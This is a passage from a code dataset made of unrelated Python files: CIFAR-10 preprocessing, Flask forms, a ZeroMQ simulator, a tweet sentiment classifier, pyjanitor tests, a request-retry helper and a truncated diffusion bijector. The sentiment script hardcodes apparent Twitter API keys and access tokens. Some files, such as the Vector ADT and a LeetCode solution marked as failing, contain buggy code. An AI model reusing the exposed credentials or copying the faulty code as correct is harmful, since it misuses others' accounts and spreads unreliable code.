test_data_dic[b'data']\n test_labels = test_data_dic[b'labels']\n\n train_data = train_data.reshape((len(train_data), 3, 32, 32))\n train_data = np.rollaxis(train_data, 1, 4)\n train_labels = np.array(train_labels)\n\n test_data = test_data.reshape((len(test_data), 3, 32, 32))\n test_data = np.rollaxis(test_data, 1, 4)\n test_labels = np.array(test_labels)\n\n return train_data, train_labels, test_data, test_labels\n\ndata_dir = 'cifar-10-batches-py'\n\ntrain_data, train_labels, test_data, test_labels = load_cifar10_data(data_dir)\n\nprint(train_data.shape)\nprint(train_labels.shape)\n\nprint(test_data.shape)\nprint(test_labels.shape)\n\n#End of online code\n\n\n\n#Converting Images To Grayscale\ngsdata = []\ngsvector = []\nfor i in range(1000):\n image = []\n image2 = [random.uniform(0,1)]\n for j in range(32):\n image_row = []\n for k in range(32):\n temp = train_data[i,j,k].astype(int)\n gray = int((temp[0] + temp[1] + temp[2])/3)\n image_row.append(gray)\n image2.append(gray)\n image.append(image_row)\n gsdata.append(image)\n gsvector.append(image2)\n\n#Testing\nx = random.randint(0,1000)\nplt.imshow(gsdata[x])\nplt.show()\n\n\nweights1 = np.random.randn(1025,1025)\nweights2 = np.random.randn(1025)\n\ndef hypothesis(picture):\n temp = gsvector.astype(float128)\n z = np.matmul(temp[picture],weights1)\n activation2 = 1/(1+np.exp(-z))\n return np.dot(activation2,weights2)\n\nprint(hypothesis(x))","sub_path":"cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"302456870","text":"from flask_wtf import FlaskForm\n# from flask_debugtoolbar import DebugToolbarExtension== only for app.py\nfrom wtforms.validators import InputRequired, Optional, URL, NumberRange, Length\nfrom wtforms import StringField, IntegerField, SelectField, BooleanField\n\n\nclass AddPetForm(FlaskForm):\n \"\"\"Form for adding a pet\"\"\"\n\n name = StringField(\"Pet Name\", validators=[InputRequired()])\n species = SelectField(\n \"Species\",\n choices=[('cat', 'Cat'), ('dog', 'Dog'), ('porcupine', 'Porcupine')],\n validators=[InputRequired()])\n photo_url = StringField(\"Photo URL\", validators=[Optional(), URL()])\n age = IntegerField(\n \"Age\", validators=[InputRequired(),\n NumberRange(min=1, max=29)])\n notes = StringField(\"Notes\", validators=[Optional(), Length(100)])\n\n\nclass EditPetForm(FlaskForm):\n \"\"\" Edit a pet form \"\"\"\n\n photo_url = StringField(\"Photo URL\", validators=[Optional(), URL()])\n notes = StringField(\"Notes\", validators=[Optional()])\n available = BooleanField(\"Available\")\n","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529124315","text":"#!/usr/bin/python\nimport argparse, logging, sys, time\nimport zmq\nimport communication\nimport configuration\nimport serialization\n\ndef main(args, context):\n\t\n\tlogger = logging.getLogger(__name__)\n\tsettings = configuration.Config()\n\tserializer = serialization.Serializer()\n\n\tinput_data = communication.connect_socket(context, socket_type = zmq.PUB, connection = settings.connections[\"input_data\"])\n\t\n\tlogger.info(\"Starting data stream. Sending %d elements.\", args.n)\n\n\ttry:\n\n\t\tfor i in xrange(args.n):\n\t\t\t\n\t\t\tlogger.debug(\"Sending: %s\", str(i))\n\n\t\t\tmessage = \"Camera data packet %s\" % str(i)\n\t\t\tmessage_buffer = serializer.write_buffer(message, topic = \"camera\")\n\t\t\tinput_data.send(message_buffer)\n\t\t\t\n\t\t\ttime.sleep(args.s)\n\t\t\n\t\tlogger.info(\"Data transfer complete.\")\n\n\texcept Exception as e:\n\t\t\tlogger.exception(\"Failed sending camera data.\")\n\t\t\tlogger.info(\"Shutting down camera data stream.\")\n\t\t\tsys.exit()\n\n\treturn\n\nif __name__ == '__main__':\n\n\t# Setup for application logging\n\tlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s: %(name)s: -- %(levelname)s -- %(message)s', filename=\"./log/camera_data.log\", filemode=\"w\")\n\tconsole = logging.StreamHandler()\n\tconsole.setLevel(logging.DEBUG)\n\tformatter = logging.Formatter('%(name)s: -- %(levelname)s -- %(message)s')\n\tconsole.setFormatter(formatter)\n\tlogging.getLogger(\"\").addHandler(console)\n\n\t# Setup for parsing command line arguments\n\tparser = argparse.ArgumentParser(prog=\"camera_data\", description='Simulates the behaviour of the camera generating relevant data.')\n\tparser.add_argument('-n', help='Number of data events to be send.', type=int, default=10)\n\tparser.add_argument('-s', help='Number of seconds to sleep in between two sends.', type=float, default=1)\n\targs = parser.parse_args()\n\n\tcontext = zmq.Context()\n\n\tmain(args, context)","sub_path":"shell/communication/python/camera_data.py","file_name":"camera_data.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"610382949","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nimport sklearn.datasets as skd\nfrom pathlib import Path\nimport tweepy\nimport datetime\n\nconsumer_key = \"F9rQX2nhkKcr7wOzYWncbLz3Y\"\nconsumer_secret = \"QQPPsZfssDLSXgm6w4y8I5JbgMonN1fjPdn1LMC6hMK1h0u94q\"\naccess_key = \"881673991-QOIo66W7sMhcgNzZRHBZ3X3CIQDDKk2Ci9Qt8Igu\"\naccess_secret = \"NQVOvRSycLK252HXvjPpetpRXTwJO4NY5vwu1wq62vtF4\"\ntag = ''\n\n\ndef trainModel():\n trainModel.categories = ['negative',\n 'positive']\n dataFolder = Path(\"files/train/\")\n trainModel.news_train = skd.load_files(dataFolder,\n categories=trainModel.categories, encoding='ISO-8859-1')\n\n trainModel.text_clf = Pipeline(\n [('vect', TfidfVectorizer()), ('clf', MultinomialNB())])\n # train the model\n trainModel.text_clf.fit(trainModel.news_train.data,\n trainModel.news_train.target)\n\n\ndef getSentiment():\n\n documents = []\n global tag\n hashtag = tag + \" -filter:retweets\"\n tweets = get_tweets(hashtag)\n for tweet in tweets:\n documents.append(tweet.text)\n\n tweetData = []\n # print(docs_test)\n for doc in documents:\n predicted = trainModel.text_clf.predict([doc])\n tweetData.append([doc, trainModel.categories[predicted[0]]])\n # print(predicted)\n # print(trainModel.categories[predicted[0]])\n print(tweetData)\n tweetDF = {\n \"data\": tweetData\n }\n if tweetDF:\n return tweetDF\n else:\n return \"No tweets found!\"\n # return trainModel.categories[predicted[0]]\n\n\ndef get_tweets(hashtag):\n\n # Authorization to consumer key and consumer secret\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n # Access to user's access key and access secret\n auth.set_access_token(access_key, access_secret)\n\n # Calling api\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n date_since = datetime.date.today() - datetime.timedelta(days=7)\n tweets = tweepy.Cursor(\n api.search,\n result_type='Popular',\n q=hashtag,\n lang=\"en\",\n since=date_since).items(5)\n return tweets\n\n\ndef mainApp(para_tag):\n global tag\n tag = para_tag\n # trainModel()\n tweetDF = getSentiment()\n # print(tweetDF)\n return tweetDF\n\n\n# mainApp(\"Air India\")\n","sub_path":"Sentiment Classifier (Naive Bayes)/SentimentClassifier.py","file_name":"SentimentClassifier.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18803401","text":"import time\n\nimport picamera\n\n# ceva\n\n# https://www.instructables.com/id/Time-Lapse-Photography-With-RPI-and-Pi-Camera/\n\nNO_OF_DAYS = 1\n\nFRAMES_PER_HOUR = 360\n\nFRAMES = FRAMES_PER_HOUR * 24 * NO_OF_DAYS\n\n\ndef capture_frame(frame_):\n with picamera.PiCamera() as cam:\n time.sleep(2)\n cam.rotation = 90\n cam.resolution = (1024, 768)\n cam.capture('/home/pi/IdeaProjects/timelapse/frame%03d.jpg' % frame_)\n\n\n# Capture the images\n\nfor frame in range(FRAMES):\n # Note the time before the capture\n\n start = time.time()\n\n capture_frame(frame)\n\n # Wait for the next capture. Note that we take into\n\n # account the length of time it took to capture the\n\n # image when calculating the delay\n\n time.sleep(\n\n int(60 * 60 / FRAMES_PER_HOUR) - (time.time() - start)\n\n )\n","sub_path":"tests/Timelapse.py","file_name":"Timelapse.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"42694040","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n# sys\nimport os\nimport sys\nimport numpy as np\nimport random\nimport pickle\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\n\n# visualization\nimport time\n\n# operation\nfrom . import tools\n\n\nclass Feeder(torch.utils.data.Dataset):\n \"\"\" Feeder for skeleton-based action recognition\n Arguments:\n data_path: the path to '.npy' data, the shape of data should be (N, C, T, V, M)\n label_path: the path to label\n random_choose: If true, randomly choose a portion of the input sequence\n random_shift: If true, randomly pad zeros at the begining or end of sequence\n window_size: The length of the output sequence\n normalization: If true, normalize input sequence\n debug: If true, only use the first 100 samples\n \"\"\"\n\n def __init__(self,\n data_path,\n label_path,\n random_choose=False,\n random_move=False,\n window_size=-1,\n debug=False,\n mmap=True):\n self.debug = debug\n self.data_path = data_path\n self.label_path = label_path\n self.random_choose = random_choose\n self.random_move = random_move\n self.window_size = window_size\n\n self.load_data(mmap)\n\n def load_data(self, mmap):\n # data: N C V T M\n\n # load label\n with open(self.label_path, 'rb') as f:\n self.sample_name, self.label = pickle.load(f)\n\n # load data\n if mmap:\n self.data = np.load(self.data_path, mmap_mode='r')\n else:\n self.data = np.load(self.data_path)\n\n if self.debug:\n self.label = self.label[0:100]\n self.data = self.data[0:100]\n self.sample_name = self.sample_name[0:100]\n\n self.N, self.C, self.T, self.V, self.M = self.data.shape\n\n def __len__(self):\n return len(self.label)\n\n def __getitem__(self, index):\n # get data\n data_numpy = np.array(self.data[index])\n label = self.label[index]\n\n # processing\n if self.random_choose:\n data_numpy = tools.random_choose(data_numpy, self.window_size)\n elif self.window_size > 0:\n data_numpy = tools.auto_pading(data_numpy, self.window_size)\n if self.random_move:\n data_numpy = tools.random_move(data_numpy)\n\n return data_numpy, label\n","sub_path":"PyTorch/contrib/cv/pose_estimation/ST-GCN/feeder/feeder.py","file_name":"feeder.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516870721","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n## Author: Sunil Patel\r\n## Copyright: Copyright 2018-2019, Packt Publishing Limited\r\n## Version: 0.0.1\r\n## Maintainer: sunil patel\r\n## Email: snlpatel01213@hotmail.com\r\n## Linkedin: https://www.linkedin.com/in/linus1/\r\n## Contributor : {if you debug, append your name here}\r\n## Contributor Email : {if you debug, append your email here}\r\n## Status: active\r\n\"\"\"\r\nimport numpy as np\r\nfrom tensorboardX import SummaryWriter\r\n\r\nif __name__ == '__main__':\r\n\r\n writer = SummaryWriter()\r\n for i in range(0, 10):\r\n dummy_img = np.random.random([3, 256, 256]) # output from network\r\n writer.add_image('Image', dummy_img, i)\r\n\r\n print(\r\n \"\"\"##################################\\n## Launch tensorboard as: ## \\n## tensorboard --logdir=runs/ ## \\n##################################\"\"\")\r\n writer.export_scalars_to_json(\"./all_scalars_2.json\")\r\n writer.close()\r\n","sub_path":"Chapter02/tfboardExperiments/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592267337","text":"\"\"\"\nVector ADT to simulate python list implementation\n\n - Vector(): Creates a new empty vector with an initial capacity of two elements.\n - length (): Returns the number of items contained in the vector.\n - contains ( item ): Determines if the given item is contained in the vector.\n - getitem ( ndx ): Returns the item stored in the ndx element of the list.\n The value of ndx must be within the valid range.\n - setitem ( ndx, item ): Sets the element at position ndx to contain the given\n item. The value of ndx must be within the valid range,\n which includes the first position past the last item.\n - append( item ): Adds the given item to the end of the list.\n - insert(ndx, item): Inserts the given item in the element at position ndx.\n The items in the elements at and following the given\n position are shifted down to make room for the new item.\n ndx must be within the valid range.\n - remove( ndx ): Removes and returns the item from the element from the given\n ndx position. The items in the elements at and following the\n given position are shifted up to close the gap created by the\n removed item. ndx must be within the valid range.\n - indexOf( item ): Returns the index of the vector element containing the given\n item. The item must be in the list.\n - extend( otherVector ): Extends this vector by appending the entire contents\n of the otherVector to this vector.\n - subVector( from, to ): Creates and returns a new vector that contains a\n subsequence of the items in the vector between and\n including those indicated by the given from and to\n positions. Both the from and to positions must be within\n the valid range.\n - iterator (): Creates and returns an iterator that can be used to traverse the\n elements of the vector.\n\"\"\"\nfrom array import Array\n\n\nclass Vector(object):\n def __init__(self, size=2):\n self.vector = Array(size)\n self.next_pos = 0\n\n def length(self):\n return len(self.vector)\n\n def contains(self, item):\n return item in self.vector\n\n def get_item(self, idx):\n return self.vector[idx]\n\n def set_item(self, idx, item):\n #print('set %s at idx %d' % (idx, item))\n self.vector[idx] = item\n # ensure insert at high index doesnt break this!\n if self.next_pos < idx:\n self.next_pos = idx + 1\n else:\n self.next_pos += 1\n\n def append(self, item):\n # find last empty position assuming contiguous entry\n # empty position has None\n # if current pos is greater than length, create another bigger array\n if self.next_pos >= self.length():\n temp = self.vector\n self.vector = Array(self.length() * 2) # double the array size\n self.next_pos = 0\n for idx, val in enumerate(temp):\n self.set_item(idx, val)\n self.set_item(self.next_pos, item)\n else:\n self.set_item(self.next_pos, item)\n\n def insert(self, idx, item):\n # only insert at valid position\n assert idx >= 0 and idx < self.length(), 'Array index out of range'\n print(self.next_pos, self.length())\n if (self.next_pos == self.length()):\n # create a new array\n temp = self.vector\n self.vector = Array(self.length() + 1)\n self.next_pos = 0\n for i, v in enumerate(temp):\n if i < idx:\n self.set_item(i, v)\n elif i >= idx:\n self.set_item(i, item)\n self.set_item(i+1, v)\n #elif self.next_pos < self.length():\n # print('==========')\n else:\n # use same array\n if not self.get_item(idx):\n self.set_item(idx, item)\n\n def __str__(self):\n return '[{!s}]'.format(', '.join(map(str, self.vector)))\n\n\nprint('Creating a new vector ...')\nv = Vector()\nprint(v)\nprint('contains 100: {}'.format(v.contains(100)))\nprint('set idx, item = 0, 100')\nv.set_item(0, 100)\nprint('contains 100: {}'.format(v.contains(100)))\nprint(v)\nprint('append an item=4')\nv.append(4)\nprint(v)\nprint('append an item=39')\nv.append(39)\nprint(v)\n\nprint('-------------------------------')\nw = Vector()\nprint(w)\nw.insert(0, 50)\nw.insert(1, 61)\nprint(w)\nw.insert(1, 35)\nprint(w)\nw.append(100)\nprint(w)\n\nprint(w)\n","sub_path":"ds_and_algos_using_python/chap_2_arrays/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598635071","text":"class Solution(object):\n def summaryRanges(self, nums):\n if not nums:\n return []\n end = nums[0]\n start = end\n result = []\n for idx in range(len(nums)):\n if idx + 1 < len(nums) and nums[idx] + 1 == nums[idx + 1]:\n continue\n end = nums[idx]\n result.append(str(start) if start == end else str(start) + '->' + str(end))\n start = nums[idx + 1]\n return result\n","sub_path":"228/228.summary-ranges.171168319.Runtime-Error.leetcode.py","file_name":"228.summary-ranges.171168319.Runtime-Error.leetcode.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195025373","text":"import pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"a\", \"Bell__Chart\", \"cities\"]),\n (True, [\"decorated-elephant\", \"animals@#$%^\"]),\n ],\n)\ndef test_select_column_names(dataframe, invert, expected):\n \"Base DataFrame\"\n columns = [\"a\", \"Bell__Chart\", \"cities\"]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"a\", \"animals@#$%^\"]),\n (True, [\"decorated-elephant\", \"cities\"]),\n ],\n)\ndef test_select_column_names_glob_inputs(dataframe, invert, expected):\n \"Base DataFrame\"\n columns = [\"Bell__Chart\", \"a*\"]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"columns\",\n [\n [\"a\", \"Bell__Chart\", \"foo\"],\n [\"a\", \"Bell__Chart\", \"foo\", \"bar\"],\n [\"a*\", \"Bell__Chart\", \"foo\"],\n [\"a*\", \"Bell__Chart\", \"foo\", \"bar\"],\n ],\n)\ndef test_select_column_names_missing_columns(dataframe, columns):\n \"\"\"Check that passing non-existent column names or search strings raises KeyError\"\"\" # noqa: E501\n with pytest.raises(KeyError):\n dataframe.select_columns(columns)\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"columns\",\n [\n pytest.param(\n \"a\",\n marks=pytest.mark.xfail(\n reason=\"`select_columns` now accepts strings\"\n ),\n ),\n pytest.param(\n (\"a\", \"Bell__Chart\"),\n marks=pytest.mark.xfail(\n reason=\"`select_columns` converts list-like into lists\"\n ),\n ),\n pytest.param(\n {\"a\", \"Bell__Chart\"},\n marks=pytest.mark.xfail(\n reason=\"`select_columns` converts list-like into lists\"\n ),\n ),\n ],\n)\ndef test_select_column_names_input(dataframe, columns):\n \"\"\"Check that passing an iterable that is not a list raises TypeError.\"\"\"\n with pytest.raises(TypeError):\n dataframe.select_columns(columns)\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"a\", \"decorated-elephant\"]),\n (True, [\"animals@#$%^\", \"cities\"]),\n ],\n)\ndef test_select_unique_columns(dataframe, invert, expected):\n \"\"\"Test that only unique columns are returned.\"\"\"\n columns = [\"Bell__*\", slice(\"a\", \"decorated-elephant\")]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"decorated-elephant\"]),\n (True, [\"a\", \"animals@#$%^\", \"cities\"]),\n ],\n)\ndef test_select_callable_columns(dataframe, invert, expected):\n \"\"\"Test that columns are returned when a callable is passed.\"\"\"\n\n def columns(x):\n return \"-\" in x.name or \"_\" in x.name\n\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.xfail(reason=\"Allow tuples which are acceptable in MultiIndex.\")\ndef test_MultiIndex():\n \"\"\"\n Raise ValueError if columns is a MultiIndex.\n \"\"\"\n df = pd.DataFrame(\n {\n \"A\": {0: \"a\", 1: \"b\", 2: \"c\"},\n \"B\": {0: 1, 1: 3, 2: 5},\n \"C\": {0: 2, 1: 4, 2: 6},\n }\n )\n\n df.columns = [list(\"ABC\"), list(\"DEF\")]\n\n with pytest.raises(ValueError):\n df.select_columns(\"A\")\n","sub_path":"tests/functions/test_select_columns.py","file_name":"test_select_columns.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354599444","text":"from PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport os\n\n\ndef load_data(percent_of_damage=0.2):\n root_dir = '/src/workspace/dataset/'\n dataset = 'bridge_masks_patches/'\n patch_dir = '100/'\n deck_dirs = ['deck_a/', 'deck_c/', 'deck_d/', 'deck_e/']\n image_list, label_list = [], []\n for deck_dir in deck_dirs:\n mask_fpath = os.path.join(root_dir, dataset, patch_dir, deck_dir)\n image_dirs = os.listdir(mask_fpath)\n for image_dir in image_dirs:\n image_names = sorted(\n os.listdir(os.path.join(mask_fpath, image_dir))\n )\n for image_name in image_names:\n img_fpath = os.path.join(\n root_dir,\n 'images_patches',\n patch_dir,\n deck_dir\n )\n img_path = os.path.join(img_fpath, image_dir, image_name)\n mask_path = os.path.join(mask_fpath, image_dir, image_name)\n img = np.asarray(Image.open(img_path))\n mask = np.asarray(Image.open(mask_path))\n image_list.append(img)\n damage_pixels = (mask / 255).sum()\n if damage_pixels > 100 * 100 * percent_of_damage:\n label_list.append(1)\n else:\n label_list.append(0)\n x = np.array(image_list)\n y = np.array(label_list)[:, np.newaxis]\n x_train, x_test, y_train, y_test = train_test_split(\n x,\n y,\n test_size=0.33,\n random_state=42\n )\n\n return (x_train, y_train), (x_test, y_test)\n\n\nif __name__ == '__main__':\n (x_train, y_train), (x_test, y_test) = load_data()\n","sub_path":"dataset/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326589333","text":"#!/usr/bin/env python\nimport requests\nimport re\n\ndef functionNcbiIDName(organism,query) :\n print(\"Querying NCBI ...\")\n Dict={}\n\n r = requests.get(\n \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=gene&term={}[Gene Name]+AND+{}[Organism]&format=json\".format(\n query, organism))\n\n if r.ok:\n decoded = r.json()\n list_id = decoded[\"esearchresult\"][\"idlist\"]\n for id in list_id :\n r2 = requests.get(\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esummary.fcgi?db=gene&id={}&retmode=json\".format(id))\n if r2.ok :\n decoded2 = r2.json()\n officialFullName = repr(decoded2[\"result\"][\"{}\".format(id)][\"description\"])\n officialFullName_clean = re.sub(\"'\", \"\", officialFullName)\n Dict[id]=officialFullName_clean\n print(\"Querying End\")\n return(list_id,Dict)\n\ndef functionKeggID(list_id):\n print(\"Querying Kegg ...\")\n r=requests.get(\"http://rest.kegg.jp/conv/genes/ncbi-geneid:{}\".format(list_id[0]))\n if r.ok:\n result = r.text.rstrip() #rsprip : enlève caractères de fin de lignes (ici espaces)\n result_split = result.split(\"\\t\")\n keggID = str(result_split[1::2]) #[startAt:endBefore:skip]\n keggID_clean = re.sub(\"[\\[\\'][\\'\\]]\", \"\", keggID)\n prefixKegg = re.sub(\"\\:.+\",\"\",keggID_clean)\n return (keggID_clean,prefixKegg)\n\ndef functionKeggPathway(keggID,prefixKegg):\n r= requests.get(\"https://www.genome.jp/dbget-bin/get_linkdb?-t+pathway+{}\".format(keggID))\n Dict={}\n if r.ok:\n listIDName = re.findall(\"{}\\d.+\".format(prefixKegg), r.text)\n for element in listIDName:\n #recuperation des voies metaboliques\n #parsing html\n line = re.sub(\"\\+.+
\", \"\", element)\n line_clean = re.sub(\"\\s{2,}\", \"\\t\", line)\n list_temporary = re.split(\"\\t\",line_clean)\n keggPathway=list_temporary[1]\n IDPathway=list_temporary[0]\n Dict[IDPathway]=keggPathway\n print(\"Querying End\")\n return(Dict)\n\n","sub_path":"Morgane/ncbiFunction.py","file_name":"ncbiFunction.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591542997","text":"from typing import Optional, List\n\nimport logging\n\nfrom tenacity import retry, wait_exponential, retry_if_exception_type, stop_after_attempt, before_log, after_log\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\ndef request_with_retry(\n attempts: int = 3, status_codes_to_retry: Optional[List[int]] = None, **kwargs\n) -> requests.Response:\n \"\"\"\n request_with_retry is a simple wrapper function that executes an HTTP request\n with a configurable exponential backoff retry on failures.\n\n All kwargs will be passed to ``requests.request``, so it accepts the same arguments.\n\n Example Usage:\n --------------\n\n # Sending an HTTP request with default retry configs\n res = request_with_retry(method=\"GET\", url=\"https://example.com\")\n\n # Sending an HTTP request with custom number of attempts\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", attempts=10)\n\n # Sending an HTTP request with custom HTTP codes to retry\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", status_codes_to_retry=[408, 503])\n\n # Sending an HTTP request with custom timeout in seconds\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", timeout=5)\n\n # Sending an HTTP request with custom authorization handling\n class CustomAuth(requests.auth.AuthBase):\n def __call__(self, r):\n r.headers[\"authorization\"] = \"Basic \"\n return r\n\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", auth=CustomAuth())\n\n # All of the above combined\n res = request_with_retry(\n method=\"GET\",\n url=\"https://example.com\",\n auth=CustomAuth(),\n attempts=10,\n status_codes_to_retry=[408, 503],\n timeout=5\n )\n\n # Sending a POST request\n res = request_with_retry(method=\"POST\", url=\"https://example.com\", data={\"key\": \"value\"}, attempts=10)\n\n # Retry all 5xx status codes\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", status_codes_to_retry=list(range(500, 600)))\n\n :param attempts: Maximum number of attempts to retry the request, defaults to 3\n :param status_codes_to_retry: List of HTTP status codes that will trigger a retry, defaults to [408, 418, 429, 503]:\n - `408: Request Timeout`\n - `418`\n - `429: Too Many Requests`\n - `503: Service Unavailable`\n :param **kwargs: Optional arguments that ``request`` takes.\n :return: :class:`Response ` object\n \"\"\"\n\n if status_codes_to_retry is None:\n status_codes_to_retry = [408, 418, 429, 503]\n\n @retry(\n reraise=True,\n wait=wait_exponential(),\n retry=retry_if_exception_type((requests.HTTPError, TimeoutError)),\n stop=stop_after_attempt(attempts),\n before=before_log(logger, logging.DEBUG),\n after=after_log(logger, logging.DEBUG),\n )\n def run():\n timeout = kwargs.pop(\"timeout\", 10)\n res = requests.request(**kwargs, timeout=timeout)\n\n if res.status_code in status_codes_to_retry:\n # We raise only for the status codes that must trigger a retry\n res.raise_for_status()\n\n return res\n\n res = run()\n # We raise here too in case the request failed with a status code that\n # won't trigger a retry, this way the call will still cause an explicit exception\n res.raise_for_status()\n return res\n","sub_path":"haystack/preview/utils/requests_utils.py","file_name":"requests_utils.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"253573250","text":"__author__ = 'lusisi'\n\nclass Solution(object):\n '''\n move 0 to the end of the list, the rest elements should keep the original order\n '''\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in xrange(len(nums)):\n if nums[i]:\n nums[cur] = nums[i]\n cur+=1\n for i in xrange(cur,len(nums)):\n nums[i] = 0\n\nclass Solution2(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in xrange(len(nums)):\n if nums[i]:\n nums[i],nums[cur] = nums[cur],nums[i] ##########\n cur+=1","sub_path":"leetcode/MoveZeros.py","file_name":"MoveZeros.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"553454706","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport os\n\ntfb = tfp.bijectors\ntfd = tfp.distributions\n\n# tf.config.run_functions_eagerly(True)\n\ntf.config.optimizer.set_jit(True)\nos.environ[\n \"TF_XLA_FLAGS\"\n] = \"--tf_xla_cpu_global_jit /mnt/c/Users/Edvin/Desktop/sde-image/sde-image-generation/diffusion-vae.py\"\n\n\nclass ConditionedDiffusionBijector(tfb.Bijector):\n def __init__(\n self,\n mu,\n sigma,\n ti,\n dt,\n paths,\n density,\n validate_args=False,\n name=\"cond_diffusion\",\n ):\n super(ConditionedDiffusionBijector, self).__init__(\n validate_args=validate_args,\n forward_min_event_ndims=1,\n inverse_min_event_ndims=1,\n name=name,\n is_constant_jacobian=True,\n )\n\n self.event_ndim = 1\n self.mu = mu\n self.sigma = sigma\n self.paths = paths\n self.time = ti\n self.ti = tf.repeat(ti, self.paths, axis=0)\n self.dt = dt\n self.density = density\n\n self.prev_x = None\n self.next_y = None\n self.point = None\n\n def _forward(self, x):\n self.prev_x = x\n next_x = (\n x\n + (self.mu(x, self.ti) * self.dt)\n + (\n self.sigma(x, self.ti)\n * tf.math.sqrt(self.dt)\n * np.random.randn(self.paths)\n )\n )\n return next_x\n\n def _inverse(self, y):\n next_y = (\n y\n + (\n (\n self.mu(y, self.ti)\n - (self.sigma(y, self.ti) * self._forward_log_det_jacobian(y))\n )\n * self.dt\n )\n + (\n self.sigma(y, self.ti)\n * tf.math.sqrt(self.dt)\n * np.random.randn(self.paths)\n )\n )\n self.next_y = next_y\n return next_y\n\n # def _inverse_log_det_jacobian(self, y, t):\n # return -self._forward_log_det_jacobian(self._inverse(y, t))\n\n def _forward_log_det_jacobian(self, x):\n self.point = tf.transpose(tf.concat([[x], [self.ti]], axis=0))\n\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(self.point)\n dlogf_dxt = tape.gradient(\n tf.math.log(self.density(self.point, training=True)), self.point\n )\n return dlogf_dxt[:, 0]\n\n\n# model\ndensity_inputs = 